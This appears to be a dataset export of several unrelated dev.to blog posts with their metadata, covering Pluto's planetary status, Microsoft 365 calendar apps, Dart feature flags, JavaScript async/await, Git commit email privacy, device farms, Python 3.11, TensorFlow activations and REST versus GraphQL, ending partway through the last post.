Плутон от нас находится неимоверно далеко. Кажется, что он совершенно безжизненный. Как бы нам не казалось, в 2015 году зонд New Horizons прислал фото заката на Плутоне. Все удивились, увидев 20 слоёв атмосферы, которые поднимаются на 1600 километров (Даже выше чем на Земле!). Собственно, Плутон - единственный транснептуновый объект, обладающий собственной атмосферой.

Атмосфера на Плутоне в 100.000 раз слабее Земной, и состоит она в основном из азота. Да, основных надежд, она, конечно, не внушает, однако сам факт её наличия выделяет её на фоне остальных кандидатов.
Что ещё интереснее, Плутон постоянно пополняет атмосферу свежим азотом, следовательно, внутри протекают неизвестные нам процессы, синтезирующие азот на поверхность Плутона.
### 2. Геологическая активность
Все мы (Ну, или почти все) представляем себе поверхность Плутона мертвую, безжизненную, усеянную кратерами. Так выглядят Эрида, Церрера -- типичный пейзаж карликовой планеты. Но фото, присланные New Horizons, буквально говорят обратное: На Плутоне огромное количество горных хребтов, глубоких впадин, каньонов и есть все признаки геологической активности. А некоторые горы достигают в высоту 3-х километров! Это свидетельствует о том, что как минимум 100 миллионов лет назад Плутон был геологически активен. Даже Марс -- наш сосед, давным-давно перестал был геологически активным.

Конечно же, для всех этих процессов нужна энергия. Много энергии. На земле эти процессы достигаются за счёт горячего ядра. А для Плутона и солнечный свет не играет почти никакой роли.
Согласно данным New Horizons вполне вероятно, что под коркой замерзшего азота и каменистой поверхности существует жидкий океан -- лучшее объяснение трещин на поверхности Плутона.
Некоторые ученые считают, что в зависимости от сезона, жидкий океан то замерзает, то снова становится жидким, что буквально "рвёт" планету. Некоторые считают, что на Плутоне существует криовулканизм.
### 3. Ошибочен-ли 3 пункт правил?

Знакомьтесь, это Филипп Мецгер -- неофициальный "адвокат" Плутона, планетолог из Университета Центральной Флориды (США). В новом исследовании, опубликованном в журнале Icarus, Филипп сообщает, что этот стандарт (очистка орбиты) классификации планет не подтверждается исследовательской литературой.
Филипп Мецгер рассмотрел научные труды за последние 200 лет и с 1802 года нашел только одну публикацию, которая использовала критерий чистоты орбиты для классификации планет и основывалась на неопровержимых рассуждениях. Более того, спутники, такие как Титан у Сатурна и Европа у Юпитера, планетологи со времен Галилея регулярно называли планетами.
«Определение МАС показывает, что фундаментальный объект планетарной науки, планета, определяется на основе концепции, которую никто не использует в своих исследованиях. И оно оставляет за бортом вторую по сложности и интересу планету в Солнечной системе. У нас есть список из более чем 100 примеров ученых-планетологов, использующих слово «планета» не так, как требует официальное определение, но они так поступают, потому что это функционально полезно», – говорит Филипп Мецгер.
Мнение ученого подкрепляется небрежностью определения. Международный астрономический союз не уточнил, что именно подразумевается под «очищением орбиты». Если смотреть на него буквально, то планет вообще нет, потому что ни одна из них не может полностью и навсегда освободить свою орбиту.
## Прекраснейшее умозаключение
Система Плутон-Харон удовлетворяет определению **двойной планеты**. На настоящий момент это единственная пара тел в Солнечной системе, которая может претендовать на такой статус. С момента открытия Плутона в 1930 году и вплоть до 1978 года Плутон и Харон считались одним и тем же небесным телом.
Немного странно лишать _все_ маленькие планеты на право называться планетами. Даже если так посмотреть, Юпитер тоже влияет на Солнце и центр масс находится **за** пределами звезды. И что же, теперь нам и Солнце исключать из списка звезд только потому, что Юпитер оказывает на него влияние?) Конечно же нет. Ученых, которые приняли решение о Плутоне в 2006 можно понять -- и требовалось ну какое-то решение. У нас нет проблем с такими планетами-гигантами как Юпитер или Сатурн, а вот с маленькими -- бывают заминки. | tell396 |
1,228,164 | Show upcoming meetings for a Microsoft 365 user | Learn how you can build a simple personal assistant in under 10 minutes that'll show a Microsoft... | 0 | 2022-10-24T09:34:19 | https://blog.mastykarz.nl/show-upcoming-meetings-user-microsoft-365/ | javascript, microsoftgraph, beginners, webdev | ---
title: Show upcoming meetings for a Microsoft 365 user
published: true
date: 2022-10-24 09:33:00 UTC
tags: javascript,microsoftgraph,beginners,webdev
canonical_url: https://blog.mastykarz.nl/show-upcoming-meetings-user-microsoft-365/
---

Learn how you can build a simple personal assistant in under 10 minutes that'll show a Microsoft 365 user the meetings they have left for the day.
## Show upcoming meetings for a Microsoft 365 user
Recently, I published an article on freeCodeCamp that shows you [how you can build in **just 10 minutes** a simple personal assistant that shows upcoming meetings for the signed-in user](https://www.freecodecamp.org/news/how-to-show-upcoming-meetings-for-a-microsoft-365-user/).

Showing upcoming meetings is a common scenario when integrating Microsoft 365 in work applications. It shows you how to get information from the user's calendar and check their availability for a particular time slot. And it's also a great way to get started with building apps on Microsoft 365.
The tutorial shows you the basics of setting up auth in a single-page app and using the Microsoft Graph JavaScript SDK to connect to the Microsoft Graph API. It also demonstrates working with calendar views and formatting dates.
Give it a try, and I'm looking forward to hearing what you think. | waldekmastykarz |
1,228,462 | How to release features from your Dart application using feature flags | When you take your software products offline to add new features, users can become frustrated,... | 0 | 2022-10-24T15:22:16 | https://configcat.com/blog/2022/10/18/feature-flags-in-dart/ | featureflags, dart, configcat, featuremanagement | When you take your software products offline to add new features, users can become frustrated, especially if their livelihood depends on it. With a new feature, there is always the risk of introducing unanticipated bugs. By incorporating feature flagging into our software release workflow, we can prevent and even lessen these situations.
## What are feature flags?
Imagine your company developing a new component or feature for an existing app. By using a feature flagging mechanism, you can tag that component, and then you can easily enable or disable the new feature within a conditional statement, without redeploying the application.
## Feature flagging in Dart
Now that we have discussed what feature flags are, let's look at how we can implement them in Dart. I have created a [sample app](https://github.com/configcat-labs/feature-flags-in-dart-sample) that you can use to follow along.
Here are the key prerequisites you'll need to start:
### Pre-requisites
- Dart SDK version: 2.17.6 - The installation instructions for your specific operating system can be found [here](https://dart.dev/tutorials/web/get-started#2-install-dart).
- A Dart compatible IDE/Editor - e.g. Visual Studio Code or any other IDE supported by Dart from this [list](https://dart.dev/tools#ides-and-editors).
- Basic knowledge of HTML and Dart
### Using the sample app
**1.** Clone the [GitHub repository](https://github.com/configcat-labs/feature-flags-in-dart-sample).
**2.** Run the following command to build and serve the app:
```sh
webdev serve
```
**3.** You should be able to view the app in your browser by visiting [http://localhost:8080/](http://localhost:8080/).

Think of the thumbnail converter shown above as the new feature to be rolled out. We can create a feature flag for it using a cloud-hosted feature flag service like [ConfigCat](https://configcat.com/).
### Integrating with ConfigCat
**1.** To start using ConfigCat, you'll need to [sign up for a free account](https://app.configcat.com/signup).
**2.** In the dashboard, start by creating a new product, then an environment, and finally a configuration. Afterward, create a feature flag that contains the following information:

3. Install ConfigCat's Dart SDK client into your Dart app with the following command:
```sh
dart pub add configcat_client
```
This will install the required functionality our Dart app will need to establish a connection to the feature flags you created in your ConfigCat dashboard.
4. In your dart file (or in the **main.dart** file if you're using the sample app provided), import the SDK in the following manner:
```sh
import 'package:configcat_client/configcat_client.dart';
```
5. Create the client with your SDK key:
```dart
final client = ConfigCatClient.get(
sdkKey: '<YOUR_SDK_KEY>', // <-- Add your SDK Key here for your environment.
);
```
By setting your SDK key, the Dart SDK can query your account for feature flags and their statuses. Generally, you should keep this key secure and not upload it to your code repository.
6. Create a variable called **canShowThumbnailConverter**. The client SDK we installed will keep this variable in sync with the status of the feature flag in your ConfigCat dashboard.
```dart
final canShowThumbnailConverter = await client.getValue(
key: 'canshowthumbnailconverter', defaultValue: false);
```
The variable created above returns a boolean value which can be used in a conditional statement to enable and disable the component.
To hide the new feature component by default, I've added the hidden HTML attribute to it. This attribute can be set or unset based on the value of the **canShowThumbnailConverter** variable, as shown below:
```dart
// If the flag is switched on
if (canShowThumbnailConverter) {
// Show the thumbnailConverterElement by removing the hidden attribute
thumbnailConverterElement.hidden = false;
} else {
// Show the featureNotAvailableElement by removing the hidden attribute
featureNotAvailableElement.hidden = false;
}
```
The final version of the **main.dart** file can be found [here](https://github.com/configcat-labs/feature-flags-in-dart-sample/blob/master/web/main.dart).
### Let's try this in a demo
1. Head over to the ConfigCat dashboard and **turn off** the feature flag:

2. Refresh the page, and you should now see the **featureNotAvailableElement** component instead:

As a bonus tip when working with feature flags, it is even possible to target smaller user segments based on their demographics and personal characteristics. An example of this could be releasing a new feature to French users over the age of twenty-three. This is incredibly useful in situations where you do not want the new feature to be available to all users.
## Final thoughts
The process of making software updates and feature rollouts shouldn't be difficult for developers. In my experience, feature flags are crucial to the rollout of features, canary deployments, and A/B tests. They always seem to be able to save the day and can be used in [many languages and frameworks](https://configcat.com/docs/sdk-reference/overview/). If you haven't adopted them yet, I highly recommend you give them a try.
## Stay in the loop
Stay on top of the latest posts and announcements from ConfigCat on [Twitter](https://twitter.com/configcat), [Facebook](https://www.facebook.com/configcat), [LinkedIn](https://www.linkedin.com/company/configcat/), and [GitHub](https://github.com/configcat).
| codedbychavez |
1,228,702 | How to effectively utilize Promise in JavaScript using Async/Await | JavaScript supports three approaches to handling asynchronous operations. The first approach... | 0 | 2022-10-25T19:42:29 | https://dev.to/efkumah/how-to-effectively-utilize-promise-in-javascript-using-asyncawait-5hlc | javascript, webdev, beginners, programming | JavaScript supports three approaches to handling asynchronous operations.
The first approach involves using callback functions. In this approach, when an asynchronous operation completes, a callback function is invoked that was passed as an argument.
See the code below:
```
function callbackFn(){
//execute when the async operation completes
}
// pass callbackFn as an argument
asyncOperation(callbackFn)
```
Using this approach results in callback hell, which creates complex, difficult-to-read, and error-prone applications as you nest callbacks into callbacks.
To handle asynchronous operations effectively, JavaScript introduced `promises` to solve the issue with callback hell.
A `Promise` is an object that serves as a placeholder for the future result of an asynchronous operation and represents our operation's current state.
Upon completion of the asynchronous operation, we return a fulfilled promise object. In the promise object, we use the `then()` method to utilize the result.
The syntax is as below:
```
const promise = asyncOperation()
promise.then(result => console.log(result))
```
`Promises` introduce a better improvement in handling asynchronous operations and solved the challenge of callback hell.
The only problem is, Promises require a series of `then()` to consume any returned Promise object, which increases the wordiness of our code.
`async/await` was introduced in ES2017 as a better approach to handling `Promises`
In this post, we will learn how to use `async/await` to utilize `Promise`.
By the end of this article, you will learn:
- Why async/await is referred to as syntactic sugar
- How to declare an async function
- What is the async keyword
- What is the await keyword
- Difference between consuming Promises using .then() vs async/await
- The benefits of using async functions
- How to handle errors in an async function
Let's get started !
## Understanding Syntactic Sugar
`async/await` is referred to as syntactic sugar to Promise, but what does this really mean? Syntactic sugar is syntax within a programming language implemented to make code easier to read or express.
Rather than using Promise Chaining, we can use async/await to write well-structured code
The code below looks well-structured and devoid of wordiness.
```
async function getSomeData(){
const response = await fetch('https://jsonplaceholder.typicode.com/posts')
const data = await response.json()
console.log(data)
}
//call the asynchronous function
getSomeData()
```
## Understanding the Async keyword
The `async` keyword prompts the JavaScript engine that, we are declaring an asynchronous function.
Using the `async` keyword prior to a function automatically transforms it into a `Promise`. Meaning, the return value of the async function will always be a Promise.
If the returned value of any async function is not clearly a promise, it would be silently wrapped in a promise
See the code below :
```
async function someAsyncOps(){
}
//call the asynchronous function
console.log(someAsyncOps())
```
See the code below:
```
async function someAsyncOps(){
}
//call the asynchronous function
console.log(someAsyncOps())
```
The output of the code will be

- There is no return value in the body of the function above. However, because of the async keyword used, the returned value was a `Promise`
To reiterate, using the `async` keyword prior to any function, the return value is a `Promise`. This promise will be settled with the value returned by the async function or rejected with an exception thrown from the async function
## Syntax of the Async function
We define the async function using either the regular function declaration or an arrow function.
The syntax of the async function is as below:
```
//function declaration
async function someAsyncOps(){
await ... //some async operation goes here
}
//arrow declaration
const someAsyncOps = async ()=>{
await ... //some async operation goes here
}
```
## Understanding the Await keyword
When an `await` expression is used, the execution of an async function is paused until a promise settles (fulfilled or rejected), returns the promised result, and then the execution resumes.
When resumed, the value of the `await` expression is that of the fulfilled promise.
The `await` keyword works only in the body of an async function. It prompts the JavaScript engine to wait for the asynchronous operation to complete before continuing with any statement below it in the function's body.
It works as a **pause-until-done** keyword, causing the JavaScript engine to pause code execution until the Promise is settled.
The syntax is as below:
```
//should be used inside an async function
let value = await promise //wait until promise is settled
```
Examine the code below:
```
async function someAsyncOps(){
//use Promise constructor
let promise = new Promise((resolve, reject)=>{
setTimeout(() => resolve('done'),4000)
});
let result = await promise; // (*) wait until promise settles
console.log(result)
console.log("Will resume execution when promise settled")
}
someAsyncOps()
```
In the code above:
The function execution "pauses" at the line (*) waiting for the promise to settle. Using the setTimeout to stimulate a delay, the promise takes about 4 seconds to settle. Once the promise settles, we return the fulfilled value to the result variable. After, any statement below that line of code will be executed.
To emphasize, the await hangs the function execution until the promise settles, and then resumes it with the promised result.
It is used as an alternative to promise handling rather than the `.then()` method.
## Inside the Async function's body
An async function's body can be thought of as being divided by zero or more await expressions.
**Top-level code is executed synchronously** and includes the first await expression (if there is one).
This way, an async function without an await expression will run synchronously. The async function will, however, always complete asynchronously if there is an await expression inside the function body
Run the code snippet below to understand
```
async function someAsyncOps(){
console.log("Top level code will execute first ") //executed synchronously
//use Promise constructor
let promise = new Promise((resolve, reject)=>{
setTimeout(() => resolve('done'),4000)
});
let result = await promise; //wait until promise settles, hence run asynchronousy
console.log(result)
console.log("Code below will resume execution now that the promise has settled")
}
//invoke the function
someAsyncOps()
```
The output will be

## Benefits of Async/Await
With async function, the JavaScript engine will pause any code execution when it encounters the await expression, and only resumes when the promise is fulfilled.
The code below uses the async function:
```
async function someAsyncOps(){
console.log('Async/Await Readying...')
let response = await fetch('https://dummyjson.com/products/1')
let result = await response.json() // pause code execution until promise is fufilled
console.log(result)
console.log('This will only execute when the promise is fulfilled')
}
someAsyncOps()
```
The output will be:

However, the `.then()` method does not pause any code execution. Code below the promise chaining will execute before the promise is fulfilled
The code below uses Promise chaining
```
function getData(){
console.log('Then method reading....')
fetch('https://dummyjson.com/products/1').then((res)=> console.log(res))
console.log('This will not pause, but will be executed before the promise is fulfilled');
}
getData()
```
The output will be

If we utilize promise chaining with `then()`, we need to implement any logic you want to **execute after the request in the promise chaining**. Else like the example above, any code that you put after fetch() will execute **immediately**, before the `fetch()` is done.
`Async/Await` also makes it simple to convert code from synchronous procedure to asynchronous procedure.
## Handling errors in an Async function
Error handling in async functions is very effortless. If the promise is rejected, we use the `.catch()` method to handle it.
Because async functions return a promise, we can invoke the function, and append the `.catch()` method to the end.
```
//handling errors in async functions
asyncFunctionCall().catch(err => {
console.error(err)
});
```
Similarly to synchronous code, if you want to handle the error directly inside the async function, we can use `try/catch`.
The `try...catch` statement is composed of a `try` block and either a `catch` block, a `finally` block, or both. `try` block code is executed first, and if it throws an exception, `catch` block code is executed.
See the code below:
```
async function someAsyncOps(){
try {
let response = await fetch('https://jsonplaceholder.typicode.co') //api endpoint error
let result = await response.json()
console.log(result)
} catch (error) {
console.log("We got some error",error) //catches the error here
}
}
someAsyncOps()
```
The output of the code will be:

## Summary
- Using `async` keyword prior to a function automatically transforms it into a `Promise`.
- When an `await` expression is used, the execution of an async function is paused until a promise settles (fulfilled or rejected), returns its result, and then the execution resumes.
- Because the `await` is valid only inside async functions, the await expression does not block the main thread from executing.
- With `async/await` we rarely need to write `promise.then/catch`
-These features make writing both readable and writable asynchronous code a breeze.
Please do comment or add your feedback, insight, or suggestion to this post. It helps clarify any concerns you might have and makes the article better.
If you have found value in this article, kindly share it on your social media platforms, and don't forget to connect with me on [Twitter](https://twitter.com/emmanuelfkumah) | efkumah |
1,229,323 | Keep your email safe on github | I recently decided to take a trip to the spam box in my email, I didn't expect much to be there.... | 0 | 2022-10-25T13:28:05 | https://dev.to/imagineeeinc/keep-your-email-safe-on-github-9c5 | git, github, privacy | I recently decided to take a trip to the spam box in my email, I didn't expect much to be there. Until I saw a single email that stood out.
The email was as follows:
> Hey
>I was just on your Github (went down a Wednesday morning rabbit hole and came up in Monaco Editor stargazers) and loved the profile.
> [Insert product advertisement here]
I was like "oh cool product, but not interested" in my head. But then something didn't felt right; how did this person send an email to my personal email, which isn't publicly visible on my github. I checked my account and it was private, I then thought it may be my portfolio that's linked there, but no. Maybe my twitter but also no.
Then it dawned on me. Git commits has your email.
I immediately did some quick research online and git apparently keeps your email when you commit, so I checked my local environment and what did I find, my personal email. I don't know how or when I gave it my personal email but its there.
So here's what I did and I feel like you should do your self if you commit to github or any public repository and value your privacy, based on [this page from github](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-personal-account-on-github/managing-email-preferences/setting-your-commit-email-address#setting-your-email-address-for-every-repository-on-your-computer) you should change your email using the command bellow on any machine from where you commit:
```shell
git config --global user.email "YOUR_EMAIL"
```
Where the `YOUR_EMAIL` bit should be the noreply email github provides, it should be some where in your [email settings](https://github.com/settings/emails) in your account.
I hope you find this post informative and if you have any thoughts or insights in this matter do comment bellow. Thanks for reading. | imagineeeinc |
1,229,327 | Why Device Farms for App Testing? | The smartphone market is huge with almost everyone owning a phone. To cater the larger customer base,... | 0 | 2022-10-25T12:44:46 | https://dev.to/kavithar/why-device-farms-for-app-testing-2j1g | The smartphone market is huge with almost everyone owning a phone. To cater the larger customer base, smartphone companies are releasing the same phone model in different versions of screen size, resolution, and cost. This is the perfect business strategy to cover a wider customer base and sell the product, however, releasing different versions of the same phone faces challenges when it comes to testing apps across all the devices. With nearly 24000 models of Android phones alone, investing on devices for testing is not a feasible option. Further, virtual devices like emulators and simulators are used as an alternative but they don’t provide accurate results as expected. Hence, the question is how to efficiently test apps across all the devices in a cost-effective manner?
The issue arising due to different screen sizes, resolutions, and operating systems are known as fragmentation and mostly found in Android than iOS devices due to the huge number of Android phones available in the market. Device Farm or Device Cloud is the most advanced solution to address the issues of fragmentation and offer accurate test results across all the devices without costing you much.
There are plenty of test automation tools available in the market that tests the app through fragmentation and other functional and non-functional aspects. One such testing platform for web and mobile app is [Tenjin Online](https://tenjinonline.com/) which has integrated Device Farm for testing the app beyond fragmentation. It is a SaaS-based platform, simple and codeless that has the capability to test all the functional and non-functional feature of the app and offer consistent, accurate, and efficient outcomes.
**Device Farms for Testing Apps**
Extensive parameterization and customization of Android ecosystem has led to serious fragmentation issues. Device Cloud, otherwise known as Device Farms, has delivered efficient solution to test the app across fragmented system by giving access to all the real devices and web browsers over Cloud. It cuts the cost of purchasing all the devices to test the app and reduces the unaddressed issues arising on virtual testing platforms like emulators and simulators. In Device Farm, the tester gets access to a wide range of devices allowing him to efficiently conduct the cross-device test which was highly challenging before the introduction of Device Farms.
A Device Farm is a testing environment that offers access to a wide range of devices for both legacy systems and upgraded versions. It supports virtual devices such as emulators and simulators allowing testing over Cloud, and also provides access to real devices. It has multiple browsers, operating systems, and devices from different manufacturers. It allows the tester to detect all functional and non-functional errors, allowing to even conduct both manual and automated testing.
**Benefits of Device Farms**
- Device Farm offers access to a wide range of devices
- Testing during scaling is easier with Cloud-based Device Farm
- Device management is easy with Device Farm
- Real-time shared access is available across all team
- Access to data at anytime and anywhere
- It is cost-effective
Introduction of Device Farms have tremendously helped the testing fraternity by offering accurate, efficient, and faster results. Prior to Device Farms, it was extremely difficult for testers to understand where the problems lie. Most of the testing was performed based on guess work presuming the app would perform in a particular manner on a particular device. Though virtual devices helped them to a certain level, Device Farms is no less than a revolution by offering ease and speed for testing.
As new devices are being released into the market, the smartphone business is increasing like never before. To ensure the quality of this huge number of smartphone devices, incorporating Device Farms are the most feasible option. It offers the best testing solution across all the devices, while fits perfectly in your budget. It allows developers to run codes across multiple devices efficiently and offers accurate results. This is by far the best solution for testing mobile apps.
## **Conclusion**
App testing across all the devices is an essential part of the QA process that decides the app’s success in the market. This step improves the app’s functioning on all the devices and ensure to enhance the app quality across all the devices. Device farms eases the app’s testing process making it efficient and quicker. The trend of Device Farm or Device Cloud has changed the course of how app testing is done by incorporating device availability, real-time access, and improved efficiency. This trend has gained immense popularity by offering efficient and cost-efficient testing solutions. This may further see advanced AI/ML integrations to increase the benefits multiple folds and yield the maximum out of it.
| kavithar | |
1,229,680 | 7 Python 3.11 new features 🤩 | Python 3.11 is out since October, 25 and comes with great new features ! Here are my top... | 0 | 2022-10-26T12:00:00 | https://blog.derlin.ch/7-python-311-new-features | python, news, programming | [Python 3.11](https://docs.python.org/3.11/whatsnew/3.11.html) is out since October, 25 and comes with great new features ! Here are my top picks.
**Covered in this article**:
* Adding notes to exceptions
* Better tracebacks
* `Self` type
* `StrEnum`, `ReprEnum` and other enum improvements
* New `logging.getLevelNamesMapping()` method
* [TOML](https://github.com/toml-lang/toml) built-in support
* (🤔 `LiteralString` ??)
See all other features on [What’s New In Python 3.11](https://docs.python.org/3.11/whatsnew/3.11.html) !
-----
**🚀🚀🚀🚀 speed improvements**: Python 3.11 is supposed to be way faster, thanks to improvements from [Faster CPython](https://docs.python.org/3.11/whatsnew/3.11.html#whatsnew311-faster-cpython) project:
> *Python 3.11 is between 10-60% faster than Python 3.10. On average, we measured a 1.25x speedup on the standard benchmark suite.*
It won't be the focus of this article, but if you are interested you should be able to find many benchmarks and details online 🤓
------
## Adding notes to exceptions
From the release notes:
> *The `add_note()` method is added to `BaseException`. It can be used to enrich exceptions with context information that is not available at the time when the exception is raised. The added notes appear in the default traceback.*
For example:
```python
if __name__ == "__main__":
try:
try:
raise TypeError("bad type")
except TypeError as type_error:
type_error.add_note("Some information")
raise
except TypeError as type_error:
type_error.add_note("And some more information")
raise
```
This will output:
```python
Traceback (most recent call last):
File "/app/notes.py", line 4, in <module>
raise TypeError("bad type")
TypeError: bad type
Some information
And some more information
```
## Better tracebacks
Staying on the exception topic, tracebacks are enriched to show the exact expression that caused the error. This is especially useful when a lot is going on on a single line.
```python
Traceback (most recent call last):
File "distance.py", line 11, in <module>
print(manhattan_distance(p1, p2))
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "distance.py", line 6, in manhattan_distance
return abs(point_1.x - point_2.x) + abs(point_1.y - point_2.y)
^^^^^^^^^
AttributeError: 'NoneType' object has no attribute 'x'
```
## `Self` type
When using type hints, it has always bothered me not to be able to refer to the current class without importing some `__future__`. There is now, *finally*, a `Self` type that can be used !
This is Python 3.10:
```python
from __future__ import annotations # this is necessary ...
class Point:
def __init__(self, x: int, y: int):
self.x = x
self.y = y
@classmethod
def origin(cls) -> Point: # .. for this to compile
return cls(0, 0)
```
With Python 3.11:
```python
from typing import Self # now, import Self
class Point:
# ...
@classmethod
def origin(cls) -> Self: # and use it instead of Point
return cls(0, 0)
```
This makes it easy to rename the `Point` class to anything, and makes the code more readable.
## `StrEnum`, `ReprEnum` and other enum improvements
The enum class has a new member, `StrEnum` especially for enum with string values. It basically adds the `auto()` feature, that avoids painful repetitions.
The new `verify()` decorator allows to ensure various constraints such as `UNIQUE`, and - for integer values only - `CONTINUOUS` and `NAMED_FLAGS`. See [`EnumChecks`](https://docs.python.org/3.11/library/enum.html#enum.EnumCheck) for details. I hope they will add more in a future version.
Finally, `IntEnum`, `IntFlag` and `StrEnum` now inherit from `ReprEnum`, which makes their `str()` output match the value of the enum instead of its class.
```python
from enum import StrEnum, verify, UNIQUE, auto
@verify(UNIQUE)
class Color(StrEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
if __name__ == "__main__":
print(Color.RED) # prints "red" instead of "Color.RED"
print(f"my color is {Color.BLUE}") # prints "my color is blue"
print("green" == Color.GREEN) # print "True"
```
## New `logging.getLevelNamesMapping()` method
This is a detail, but I can't count how often I had to manually list the logging levels available in my `argparse` choices for command line tools...
Python 3.11 finally provides this mapping for us, using `getLevelNamesMapping()`. Here is how I would typically use it:
```python
import argparse, logging
if __name__ == "__main__":
# Get the logging levels available ...
levels = logging.getLevelNamesMapping()
parser = argparse.ArgumentParser()
parser.add_argument("-l", "--level",
choices=levels.keys(), # ... list them as arguments ...
default="CRITICAL",
type=str.upper) # (make it case insensitive)
args = parser.parse_args()
# ... and apply the chosen one
logging.basicConfig(level=levels[args.level])
```
## [TOML](https://github.com/toml-lang/toml) built-in support
Python 3.11 is adding the [tomllib](https://docs.python.org/3.11/library/tomllib.html#module-tomllib) to the standard library.
[TOML - Tom's Obvious, Minimal Language](https://github.com/toml-lang/toml), is a minimal configuration file format that's easy to read due to obvious semantics. I often find it better than YAML for simple configurations.
Take the following TOML file:
```toml
title = "TOML Example"
[owner]
name = "Tom Preston-Werner"
dob = 1979-05-27T07:32:00-08:00 # First class dates
[database]
server = "192.168.1.1"
ports = [ 8000, 8001, 8002 ]
connection_max = 5000
enabled = true
[servers]
# Indentation (tabs and/or spaces) is allowed but not required
[servers.alpha]
ip = "10.0.0.1"
dc = "eqdc10"
[servers.beta]
ip = "10.0.0.2"
dc = "eqdc10"
# ... more config
```
With python 3.11, just do:
```python
import tomllib
def main() -> None:
with open("configuration.toml", "rb") as f:
data = tomllib.load(f)
print(data)
if __name__ == "__main__":
main()
```
The result, `data`, holds a dictionary with all the config and proper types (see the `datetime` here ?):
```
{'title': 'TOML Example', 'owner': {'name': 'Tom Preston-Werner', 'dob': datetime.datetime(1979, 5, 27, 7, 32, tzinfo=datetime.timezone(datetime.timedelta(days=-1, seconds=57600)))}, 'database': {'server': '192.168.1.1', 'ports': [8000, 8001, 8002], 'connection_max': 5000, 'enabled': True}, 'servers': {'alpha': {'ip': '10.0.0.1', 'dc': 'eqdc10'}, 'beta': {'ip': '10.0.0.2', 'dc': 'eqdc10'}}}
```
## 🤔 `LiteralString` ??
Ok, I must admit I didn't even know about those `LiteralString` before reading the release notes... But they are quite nice !
**The theory**
When a function receives a `LiteralString` instead of a `str`, it allows the type checks to fail in case an argument is passed that contains some dynamic, user-provided value. It is mostly used with databases, to avoid SQL injections.
**In practice**
I couldn't make it work. Here is my code, which runs perfectly whell, without any of the errors defined in [PEP 675](https://peps.python.org/pep-0675/):
```python
from typing import LiteralString
import argparse
def run_query(sql: LiteralString) -> None:
print(f"Executing: {sql}")
if __name__ == "__main__":
static_table: str = "bar"
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--table", required=True)
args = parser.parse_args()
# ok
run_query("SELECT foo FROM bar")
run_query("SELECT " + 'foo' + f" FROM {static_table}")
# should fail (dynamic argument)
run_query(f"SELECT foo from {args.table}")
```
All of this compiles and runs fine from my `python:3.11.0` docker image... If you understand this feature, please let me know in the comments !
## And much more !
Have a look at the release notes for more awesome new features: [What’s New In Python 3.11](https://docs.python.org/3.11/whatsnew/3.11.html)
Let me know if the comments what *you* found interesting in this release !
| derlin |
1,229,716 | Day-19 of Machine Learning: | Day-19 of Machine Learning: I. Basic template of TensorFlow implementation: 1. construct... | 19,490 | 2022-10-25T18:09:18 | https://dev.to/ank1tas/day-19-of-machine-learning-1cfc | beginners, machinelearning, tensorflow, neuralnetwork | Day-19 of Machine Learning:
I. Basic template of TensorFlow implementation:
#### 1. construct the network
```python
model = Sequential(
[
tf.keras.Input(shape=(400,)), #specify input size
Dense(25, activation='sigmoid'),
Dense(15, activation='sigmoid'),
Dense(1, activation='sigmoid')
], name = "my_model"
)
```
Keras Sequential model and Dense Layer with sigmoid activations.
#### 2. loss function
```python
model.compile(
loss=tf.keras.losses.BinaryCrossentropy(),
optimizer=tf.keras.optimizers.Adam(0.001),
)
```
Here for **binary classification**, BinaryCrossentropy() is used. We can also use MeanSquareError() for Linear regression.
#### 3. gradient descent to fit the weights of the model to the training data
```python
model.fit(
X,y,
epochs=20
)
```
---
II. Got to know about different Activation
##### - Linear Activation:
Activation **a = g(Z) = Z**
where Z = W.X + b
**Output y** might be an Integer number **(+ve/-ve)**
##### - Sigmoid Activation:
Activation **a = g(Z) = 1 / (1 + e ^ (-Z))**.
**Output y** might be **0 or 1 i.e binary classification**
##### - ReLU Activation (Rectified Linear Activation):
Activation **a = g(Z) = max (0, Z)**.
**Output y** will be any **Whole number**
---
III. How to choose Activation?
We can choose different activation within a Neural Network for separate layers and activations can be chosen accordingly requirement and goal of the Neural Network. However some recommendations are,
- A neural network with many layers but no activation function is not effective. A Neural network with **only linear activation** is the same as **no activation function**.
- ReLU are often use than Sigmoid activation. It is because firstly **ReLU is a bit faster as it does less computation (max of 0 and Z)** than sigmoid which does exponential then inverse and so on. Secondly Gradient Descent goes slow for flat and ReLU goes flat in one place whereas Sigmoid in 2 places.
- Use **ReLU** instead of Linear Activation in **Hidden layers**.
| ank1tas |
1,268,978 | REST API vs GraphQL | You have probably heard about GraphQL, but you might not be entirely sure how and whether it differs... | 0 | 2022-11-28T08:23:18 | https://dev.to/documatic/rest-api-vs-graphql-1a0n | node, graphql, javascript, webdev | You have probably heard about GraphQL, but you might not be entirely sure how and whether it differs from REST. You're in luck, then! Today, we'll go over some fundamentals regarding both REST and GraphQL and the various use cases of each of them.
The popularity of GraphQL as a replacement for REST APIs is growing. Though it isn't necessarily a "replacement".
You will need to decide between GraphQL, REST API, or a combination of both depending on your use cases. Let's compare REST with GraphQL and learn some of the benefits of GraphQL in order to make a more informed conclusion.
## REST APIs

A REST (Representational state transfer) API is an architectural style for an application program interface (API) that uses HTTP requests to access and use data. That data can be used to GET, PUT, POST and DELETE data types, which refers to the reading, updating, creating and deleting of operations concerning resources.
A RESTful API uses HTTP methods to carry out CRUD (Create, Read, Update, and Delete) processes while working with data.
In order to facilitate caching, AB testing, authentication, and other processes, headers offer information to clients and servers.
The body houses data that a client wants to transmit to a server, like the request's payload.
## GraphQL APIs

GraphQL is a query language for APIs and a runtime for fulfilling those queries with your existing data. GraphQL provides a complete and understandable description of the data in your API, gives clients the power to ask for exactly what they need and nothing more, makes it easier to evolve APIs over time, and enables powerful developer tools. With popular known organizations like Twitter, Expedia, Shopify, to mention a few, GraphQL has been widely adopted and is primarily maintained and developed by the GraphQL Foundation.
## GraphQL vs. REST:

The key difference between GraphQL and REST APIs is that GraphQL is a query language, while REST is an architectural concept for network-based software.
Again, The way that data is supplied to the client is where GraphQL and REST diverge the most. In a REST design, a client submits an HTTP request, and data is returned as an HTTP response. In a GraphQL architecture, a client submits queries to obtain data.
## Typical Scenarios
### REST APIs
Let's say you have an API to fetch a student data. In a typical REST scenario, this is what the request/response would look like:
```javascript
// HTTP REQUEST
GET api/students/1 || api/students?id=1
// HTTP RESPONSE
{
"id": 1
"name": "john doe",
"class": 3,
"age": 11
}
```
